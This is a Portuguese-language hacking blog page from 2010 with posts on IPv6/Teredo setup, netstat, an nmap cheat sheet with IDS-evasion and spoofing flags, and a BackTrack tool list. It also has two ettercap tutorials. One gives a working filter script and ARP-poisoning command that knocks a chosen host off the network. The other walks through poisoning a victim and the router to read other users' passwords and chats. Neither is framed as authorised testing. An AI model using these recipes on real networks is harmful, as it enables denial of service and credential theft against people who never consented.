banner468

terça-feira, 6 de julho de 2010

Instalando o IPv6

Vamos instalar e configurar.

Debian, Ubuntu.

Instale o pacote miredo:


Citação:
$ sudo apt-get install miredo
Após este comando, você verá um endereço IPv6, começando com "2001:0:" em suas configurações de rede (use "ifconfig"). Se assim for, você está conectado ao mundo IPv6.

para remover os links de iniciação do sitema:

Citação:
$ sudo update-rc.d -f miredo remove
Ou


Citação:
$sudo apt-get remove miredo
Uso:

Citação:
$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}
Se miredo está funcionando você deve ter outra interface chamada "Teredo".
Você pode exibi-lo com o seguinte comando:

Citação:
$ ifconfig teredo
Para testar se você pode acessar a rede IPv6, tente o seguinte:

root@bt:~$ ping6 ipv6.google.com PING ipv6.google.com(iw-in-x63.1e100.net) 56 data bytes 64 bytes from iw-in-x63.1e100.net: icmp_seq=1 ttl=55 time=284 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=4 ttl=55 time=100 ms 64 bytes from iw-in-x63.1e100.net: icmp_seq=5 ttl=55 time=108 ms --- ipv6.google.com ping statistics --- 7 packets transmitted, 3 received, 57% packet loss, time 6000ms rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m

root@bt:~$ ping6 www.ipv6.org PING www.ipv6.org(igloo.stacken.kth.se) 56 data bytes 64 bytes from igloo.stacken.kth.se: icmp_seq=1 ttl=58 time=472 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=2 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=3 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=5 ttl=58 time=156 ms 64 bytes from igloo.stacken.kth.se: icmp_seq=6 ttl=58 time=156 ms --- www.ipv6.org ping statistics --- 7 packets transmitted, 5 received, 28% packet loss, time 6000ms rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms

root@bt:~$ traceroute6 www.ipv6.org traceroute to www.ipv6.org (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets 1 * * * 2 terminator.csbnet.se (2a02:9a0:0:1::193) 612.035 ms 612.035 ms 612.035 ms 3 c2sth-ge-5-0-8.sunet.se (2001:6b0:dead:beef:2::3a9) 648.037 ms 648.037 ms 648.037 ms 4 a1sth-kth.sunet.se (2001:6b0:dead:beef:2::2c6) 636.036 ms 636.036 ms 636.036 ms 5 2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2) 736.042 ms 736.042 ms * 6 * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3) 324.018 ms 324.018 ms 7 igloo.stacken.kth.se (2001:6b0:1:ea:202:a5ff:fecd:13a6) 160.009 ms 156.009 ms 156.009 ms

Alterando servidor Teredo:

sudo vi /etc/miredo.conf ServerAddress teredo.ipv6.microsoft.com sudo /etc/init.d/miredo restart

Windows XP

Instalando:

Clique no menu "Iniciar" > Executar > "CMD"
Digite:

netsh interface ipv6 install netsh interface ipv6 set teredo client
Para desinstalar:

netsh interface ipv6 uninstall

Vista

Instalar
IPv6 e Teredo é ativado por padrão. Você pode entrar em configurações, ir para as preferências de uma interface de rede. "Obter um endereço IPv6 automaticamente" deve fazer o truque.

Desinstalar
Adicione esse valor do Registro ("DWORD") definido para 0xFF (dê um duplo clique e cópia):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip6\Parameters\DisabledComponents
Ou salvar as duas linhas em um arquivo. Duplo clique em .reg:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip6\Parameters] "DisabledComponents"=dword:000000ff
Você também pode ir para as propriedades de interface de uma interface de rede e desmarque o protocolo IPv6 para essa interface. Para ativar o IPv6 novamente, substitua dword:000000ff acima com dword:00000000.

Fonte:

http://pugio.net/2007/07/howto-enable-ipv6-the-teredo-w.html
https://blueimp.net/linux/howto/ipv6-teredo.html

Curso de IPv6 On line:
http://bhior.blogspot.com/2010/07/curso-ipv6.html

domingo, 4 de julho de 2010

Denial Of Service (DOS) com ettercap

Um ataque de negação de serviço (também conhecido como DoS - Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores.

Na vídeo aula e passada dentro de um ambiente de rede interna, no meu caso eu ja sabia qual o endereço de ip da maquina a qual eu quero usar o ataque, mas você podem usar ferramentas de rede para identificar maquinas que estão ligadas no momento para um possível ataque, ex: de uma ferramenta muito utilizado e o nmap, lembrando que existe inúmeras ferramentas para esse fim.


Primeiro passo -> Criar uma arquivo com a extensão .eft, no caso especifico eu coloquei o nome de dos.eft que poderia ser qualquer nome.

if (ip.src == 'IP do alvo' || ip.dst 'IP do alvo') {
drop();
kill();
msg("Mensagem que sera imprimida na tela\n");
}

Segundo passo -> Temos que compilar o arquivo com o filtro do ettercap, para que o mesmo possa executar o arquivo. Então abram o terminal e digite a seguinte sintaxe de comando:
OBS: Olhe para o local onde foi salvo o arquivo, no meu caso foi na pasta "root", minha area de trabalho.

# etterfilter dos.eft -o dos.ef

Terceiro passo -> Vamos da inicio ao ataque, usando o ettercap:

# ettercap -T -q -F /local.do.arquivo/dos.ef -M arp /IP do alvo/ // -i etho

Obs: eth0 - e minha interface de rede.


Volia, se o host alvo tentar acessar a internet, estava impedido de executar tal função.... rsrs


O que acontece?

Faço o MITM com ettercap e uso o filtro que eu criei o dos.ef, quando o host alvo faz uma solicitação, o ettercap simplesmente descarta os pacotes e não deixa os mesmo chegarem ao destino... com isso temos uma negação de serviço.

Baixar:
http://www.4shared.com/file/knAfoYZE/Denial_Of_Service_ettercap_.html

Assisti on-line:




sexta-feira, 2 de julho de 2010

BackTrack – Penetration Testing Distribution


Backtrack , distribuição com foco em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido.

Ferramentas encontradas no BackTrack:

 

Coleta de Informações

  • Ass
  • DMitry
  • DNS-Ptr
  • dnswalk
  • dns-bruteforce
  • dnsenum
  • dnsmap
  • DNSPredict
  • Finger Google
  • Firewalk
  • Goog Mail Enum
  • Google-search
  • Googrape
  • Gooscan
  • Host
  • Itrace
  • Netenum
  • Netmask
  • Pirana
  • Protos
  • QGoogle
  • Relay Scanner
  • SMTP-Vrfy
  • TCtrace

Mapeamento de Rede

  • Amap 5.2
  • Ass
  • Autoscan 0.99_R1
  • Fping
  • Hping
  • IKE-Scan
  • IKEProbe
  • Netdiscover
  • Nmap
  • NmapFE
  • P0f
  • PSK-Crack
  • Ping
  • Protos
  • Scanrand
  • SinFP
  • Umit
  • UnicornScan
  • UnicornScan pgsql 0.4.6e module version 1.03
  • XProbe2

PBNJ 2.04

  • OutputPBNJ
  • ScanPBNJ
  • Genlist

Identificação de vulnerabilidade

  • Absinthe
  • Bed
  • CIRT Fuzzer
  • Checkpwd
  • Cisco Auditing Tool
  • Cisco Enable Bruteforcer
  • Cisco Global Exploiter
  • Cisco OCS Mass Scanner
  • Cisco Scanner
  • Cisco Torch
  • Curl
  • Fuzzer 1.2
  • GFI LanGuard 2.0
  • GetSids
  • HTTP PUT
  • Halberd
  • Httprint
  • Httprint GUI
  • ISR-Form
  • Jbrofuzz
  • List-Urls
  • Lynx
  • Merge Router Config
  • Metacoretex
  • Metoscan
  • Mezcal HTtp://S
  • Mibble MIB Browser
  • Mistress
  • Nikto
  • OAT
  • Onesixtyone
  • OpenSSL-Scanner
  • Paros Proxy
  • Peach
  • RPCDump
  • RevHosts
  • SMB Bruteforcer
  • SMB Client
  • SMB Serverscan
  • SMB-NAT
  • SMBdumpusers
  • SMBgetserverinfo
  • SNMP Scanner
  • SNMP Walk
  • SQL Inject
  • SQL Scanner
  • SQLLibf
  • SQLbrute
  • Sidguess
  • Smb4K
  • Snmpcheck
  • Snmp Enum
  • Spike
  • Stompy
  • SuperScan
  • TNScmd
  • Taof
  • VNC_bypauth
  • Wapiti
  • Yersinia
  • sqlanlz
  • sqldict
  • sqldumplogins
  • sqlquery
  • sqlupload

Penetração

  • Framework3-MsfC
  • Framework3-MsfUpdate
  • Framework3-Msfcli
  • Framework3-Msfweb
  • Init Pgsql (autopwn)
  • Milw0rm Archive
  • MsfCli
  • MsfConsole
  • MsfUpdate
  • OpenSSL-To-Open
  • Update Milw0rm

Escalação de Privilégio

  • Ascend attacker
  • CDP Spoofer
  • Cisco Enable Bruteforcer
  • Crunch Dictgen
  • DHCPX Flooder
  • DNSspoof
  • Driftnet
  • Dsniff
  • Etherape
  • EtterCap
  • File2Cable
  • HSRP Spoofer
  • Hash Collision
  • Httpcapture
  • Hydra
  • Hydra GTK
  • ICMP Redirect
  • ICMPush
  • IGRP Spoofer
  • IRDP Responder
  • IRDP Spoofer
  • John
  • Lodowep
  • Mailsnarf
  • Medusa
  • Msgsnarf
  • Nemesis Spoofer
  • NetSed
  • Netenum
  • Netmask
  • Ntop
  • PHoss
  • PackETH
  • Rcrack
  • SIPdump
  • SMB Sniffer
  • Sing
  • TFTP-Brute
  • THC PPTP
  • TcPick
  • URLsnarf
  • VNCrack
  • WebCrack
  • Wireshark
  • Wireshark Wifi
  • WyD
  • XSpy
  • chntpw

Mantendo Acesso

  • 3proxy
  • Backdoors
  • Matahari
  • CryptCat
  • HttpTunnel Client
  • HttpTunnel Server
  • ICMPTX
  • Iodine
  • NSTX
  • Privoxy
  • ProxyTunnel
  • Rinetd
  • TinyProxy
  • sbd
  • socat

Cobrindo Rastros

  • Housekeeping

Análise de Rede de Rádio

802.11

  • AFrag
  • ASLeap
  • Air Crack
  • Air Decap
  • Air Replay
  • Airmon Script
  • Airpwn
  • AirSnarf
  • Airodump
  • Airoscript
  • Airsnort
  • CowPatty
  • FakeAP
  • GenKeys
  • Genpmk
  • Hotspotter
  • Karma
  • Kismet
  • Load IPW3945
  • Load acx100
  • MDK2
  • MDK2 for Broadcom
  • MacChanger
  • Unload Drivers
  • Wep_crack
  • Wep_decrypt
  • WifiTap
  • Wicrawl
  • Wlassistant

Bluetooth

  • Bluebugger
  • Blueprint
  • Bluesnarfer
  • Btscanner
  • Carwhisperer
  • CuteCom
  • Ghettotooth
  • HCIDump
  • Ussp-Push

Análise VOIP & Telefonia

  • PcapSipDump
  • PcapToSip_RTP
  • SIPSak
  • SIPcrack
  • SIPdump
  • SIPp
  • Smap

Forense Digital

  • Allin1
  • Autopsy
  • DCFLDD
  • DD_Rescue
  • Foremost
  • Magicrescue
  • Mboxgrep
  • Memfetch
  • Memfetch Find
  • Pasco
  • Rootkithunter
  • Sleuthkit
  • Vinetto

Engenharia Reversa

  • GDB GNU Debugger
  • GDB Console GUI
  • GDB Server
  • GNU DDD
  • Hexdump
  • Hexedit
  • OllyDBG

Serviços

  • SNORT


Baixar: http://www.backtrack-linux.org/downloads/

Forum: http://www.backtrack-linux.org/forums
              http://forums.remote-exploit.org/
              www.backtrack.com.br

quinta-feira, 1 de julho de 2010

Planilha de Comandos Rápidos do NMap


Uso: 
nmap [Tipo de Scan ] [Opções] (especificação de destino)





Especificação "TARGET"


Pode passar hostnames, endereços IP, redes, etc
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

-iL :
Entrada da lista de hosts / redes

-iR :
Escolhe alvos aleatórios

--exclude :
Excluir hosts da redes

--excludefile :
Lista de exclusão de arquivo



Host discovery


-SL: List Scan - metas simplesmente uma lista de verificação

-sL: List Scan - lista de verificação

-sP: Ping Scan - determinar se o host está online

-P0: Tratar todos os hosts como online - skip descoberta de hosts

-PS[portlist]: TCP SYN descobre dados das portas

-PA[portlist]: TCP ACK descobre dados das portos

-PU[portlist]: UDP descobre dados das portas

-PE: ICMP echo request descobre perdido (Descobre pacotes icmp perdidos)

-PP: timestamp reques descobre perdido

-PM: netmask request descobre perdido

-n/-R: Never/Always às vezes resolver DNS padrão

--dns-servers :
Especificar servidores DNS personalizado
--system-dns:
Resolver dns do SO´s


Técnicas de escaneamento

-sS: TCP SYN Scan
-sT: Connect Scan
-sA: ACK Scan
-sW: Windows Scan
-sM: Maimon scan
-sN: TCP Null, scan
-sF: FIN Scan
-sX: Xmas Scan
--scanflags : Customize TCP scan flags
-sI : Idlescan
-sO: IP protocol scan
-b : FTP bounce scan


Especificação de Portas e Ordem de Scan

-p : Escaneia apenas as portas especificadas
-F: Fast - Escaneia apenas as portas listados no arquivo nmap-services
-r: Escaneia portas consecutivamente - não aleatoriamente



Detecção de versão/serviço


-sV: Probe abrir portas determinar serviço de informação / versão
--version-intensity :
Set de 0 (claro) a 9 (tentar todas as sondas)
--version-light:
Limite para as sondas mais provável (intensidade 2
--version-all:Experimente todas as sondagens (intensidade 9)
--version-trace:
Mostrar versão detalhada verificação de atividade (para depuração)



detecção de SO


-O: Ativar a detecção de SO
--osscan-limit:
Limite de detecção de SO a alvos promissores
--osscan-guess:
Guess OS de forma mais agressiva



Calendário e desempenho


Opções que tomar são em milissegundos, a menos que você adicione 's' (segundos), 'm' (minutos), ou 'h' (horas) para o valor (por exemplo, 30m).
-T[0-5]: definir modelo de calendário (mais alto é mais rápido)
--min-hostgroup/max-hostgroup :
Parallel host scan group sizes
--min-parallelism/max-parallelism
Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout
Especifica o tempo de ida e volta.
--max-retries :
Caps número de retransmissões de sondagens de scan de portas.
--host-timeout
Dê-se no alvo após este tempo
--scan-delay/--max-scan-delay
Ajuste o atraso entre sondagens



FIREWALL/IDS EVASION e SPOOFING


-f; --mtu :
fragmentar pacotes (opcionalmente w / dado MTU)
-D :
Disfarça um scan com chamarizes
-S :
Disfarça o endereço de origem
-e :
Usa a interface especificada
-g/--source-port :
Use o número de determinada porta
--data-length :
Acrescenta dados aleatórios nos pacotes enviados
--ttl : Defina o campo IP time-to-live
--spoof-mac :
Disfarça o endereço MAC
--badsum:
Enviar pacotes TCP/UDP com um falso checksum



OUTPUT


-oN : Saída de digitalização em formato normal
-oX : Saída de digitalização em formato XML
-oS : Saída digitalizar S|
-oG : Saída de digitalização em formato grep
-oA : Saída em três principais formatos de uma só vez
-v: nível de verbosidade (uso duas vezes por mais efeito)
-d[level]: Ajusta ou aumentar o nível de depuração (até 9)
--packet-trace:
Mostrar todos os pacotes enviados e recebidos
--iflist:
nterfaces de impressão do host e rotas (para depuração)
--log-errors: Log de erros / avisos para a saída em formato de arquivo normal
--append-output:
Acrescentar ao invés de sobrepor especificado arquivos de saída
--resume : Continuar um scan abortado
--stylesheet :
folha de estilo XSL para transformar a saída XML para HTML
--webxml:
Referência de estilo de Insecure.Org
para XML mais portátil
--no-stylesheet: Evitar associação de estilo XSL w / saída XML



MISC


-6: Ativar varredura IPv6
-A: Permite a detecção de SO e detecção de versão
--datadir :
Especificar os dados personalizados Nmap localização do arquivo
--send-eth/--send-ip:
Enviar usando frames ethernet em estado bruto ou pacotes IP
--privileged:
Suponha que o usuário é altamente privilegiado
-V: número de versão de impressão
-h: Imprima esta página de resumo de ajuda.



EXEMPLOS


Simples
nmap -v -A scanme.nmap.org
nmap -v -sP 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -P0 -p 80
nmap -v –sS scanme.nmap.org > arquivo.txt


Popular sintaxe / Publicação

NMAP -vv -A -sS -O -p- -P0 -oX target.xml www.xxx.yyy.zzz

nmap -vv -sS -P0 –p- -n --min_hostgroup 100 --max_retries 3
--max_rtt_timeout 1250 --min_parallelism 100 -oA

nmap -vv -p -sT -A -P0 -n --min_hostgroup 100
--max_rtt_timeout 1250 --min_parallelism 100 -oA -iL
liveIPList
Nmap
Baixar: http://nmap.org/download.html 

Backtrack 4 em Idioma Português e Português do Brasil

Aperte alt+f2 e digite "konsole" ou clique no ícone do shell.


# apt-get install language-pack-pt language-pack-kde-pt language-pack-pt-base language-support-pt language-support-writing-pt


Obs:
Para usuários do KDE 3.5.x é necessário instalar:

# apt-get install kde-i18n-pt
# apt-get install kde-i18n-ptbr


Para usuários do KDE 4.x.x, é necessário instalar:

# apt-get install kde-l10n-pt
# apt-get install kde-l10n-ptbr


Apos a instalação dos pacotes:

KDE > Settings > Regions & Accessibility > Country/Region & Language > Add language > Português Brasil

Créditos ao firebits e implementado por Bhior.

Netstat

Netstat (NETwork STATistics - estatísticas de rede) é uma ferramenta usando em linha de comando que fornece informações sobre atividades e configurações de rede.

Exibindo tabelas de roteamento:


# netstat -rn

-r -> Tabelas de roteamento do kernel
-n -> Exibe endereços numéricos ao invés de determinar o hosts.




Para exibir rapidamente as estatiscias de interfaces:

# netstat -i

-i -> Interfaces


Para exibir mais informações sobre as interfaces:

# netstat -ie

-i -> Interfaces
-e -> Obter mais informações


 Obs: "netstat -ie" e igual ao "ifconfig" e "ifconfig -a".

Para exibir todos os sockets de rede abertos:

# netstat -uta

-u-> UDP
-t -> TCP
-a -> Todos


As portas escuntando são exibidas se você esperfica a seguinte --listening (-l) ou --all (-a)

ESTABLISHED ->  O socket tem uma conexão estabelecida.
SYN_SENT ->  O socket está ativamente tentando estabelecer uma conexão. 
SYN_RECV ->  A solicitação de conexão foi recebida da rede.
FIN_WAIT1 -> O socket é fechado ea conexão está sendo desligado.
FIN_WAIT2 -> Conexão é fechada eo socket está esperando por um desligamento do terminal remoto.  
TIME_WAIT -> O socket está esperando após ser fechado para lidar com os pacotes ainda na rede.
CLOSE -> O socket não está sendo usado.
CLOSE_WAIT ->  O lado remoto foi desligado, aguardando o socket fechar.

LAST_ACK - > O lado remoto foi desligado, eo socket está fechado. Esperando por uma confirmação. 
LISTEN -> O socket está ouvindo por conexões. Essas bases não são incluídos na saída a não ser que você especifique --listening (-l) ou --all (-a).
CLOSING -> Ambos os sockets estão encerradas, mas nós ainda não temos todos os dados enviados.  
UNKNOWN -> O estado do socket é desconhecido.  

Para exibir todos os soquetes de rede abertos (estendendo informações): 

# netstat -aute

-a -> All
-u -> UDP
-t -> TCP
-e -> Obter mais informações



Para exibir todos os sockets que estão escutando:

# netstat -lt

-t -> TCP
-l -> Listando o estado dos sockets


Para exibir as estatísticas de resumo para cada protocolo:

# netstat -s

-s -> Resumo das estatísticas para cada protocolo.


Para maiores informações digite no terminal # man netstat ou info netstat
Comado de uso: # netstat --help
 Ate que... FIM!

 

terça-feira, 22 de junho de 2010

Guia basico do Ettercap

Guia basico do Ettercap

O ettercap um programa classificado com sniffer, pois o mesmo captura dados em uma rede local. Farejadores como são conhecidos os sniffer eles capturam todo trafego da rede, com isso podemos capturar senhas digitadas por outros usuários de nossa rede. Analisando os dados podemos captura conversas de clientes de mensagem do tipo MSN ou outros clientes de mensagem instantânea, podemos ser usando com man-in-the-midler "MITM"(Homem no meio) e etc.

Primeiro passo e instalar o farejador(ettercap).
Ultima versão e 0.7.3 e temos disponível para SO Linux e Windows.


Windows: http://sourceforge.net/projects/ette...aries/windows/ 


Linux: http://ettercap.sourceforge.net/download.php



Para distros baseadas no debian/ubuntu:



# apt-get install ettercap-gtk 
Para outras distribuições, temos que compilar os pacotes.



# ./configure
# make
# make install
Vamos iniciar.

Próximo passo e iniciar o ettercap, para linux temos que inicia-lo em modo root, caso contrario não temos como selecionar a interface.



Sniffer > Unified Sniffing

Selecione a interface que está conectada à rede que você quer farejar, clique em"OK".

Host > Scan for hosts.
Na parte inferior da tela, como "Host list , são hosts adicionados" ( Os que estão listados abaixo são os micros que estão on-line na sua rede no momento).



Hosts > Host list
Agora aparecem os IPs das máquinas conectadas, é preciso ter em mente que o roteador também aparece (Lembrando que nosso micro não e mostrado).

Selecione o IP do seu computador para atacar e clique em "Add to Target 1", em seguida, o roteador "Add to Target 2".



Antes de começar o farejamento, e bom lembrar que a técnica usando e chamada de man-in-the-midler(Homem no meio), ai você me pergunta, mas como e isso? todos pacotes que saem do micro alvo, passam por minha maquina antes de chegar ao destino. É possível que a parti de algum tempo usando o MITM o host da vitima fique off por alguns segundos ate que as tabelas ARP sejam resetadas.

Mitm > ARP Poisoning - Agora clique na guia "Sniff remote connections" e clique em "OK"



Start > Start sniffing.



Estamos capturando o trafego de rede.

View > Connections - Aqui podemos ver todas as conexões e clique duas vezes em um pode ver os dados que ele contém, inclusive conversas, os usuários e senhas, etc.

Agora e deixar farejando.

Ler os logs... Xeque mate!

Att, Bhior.

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers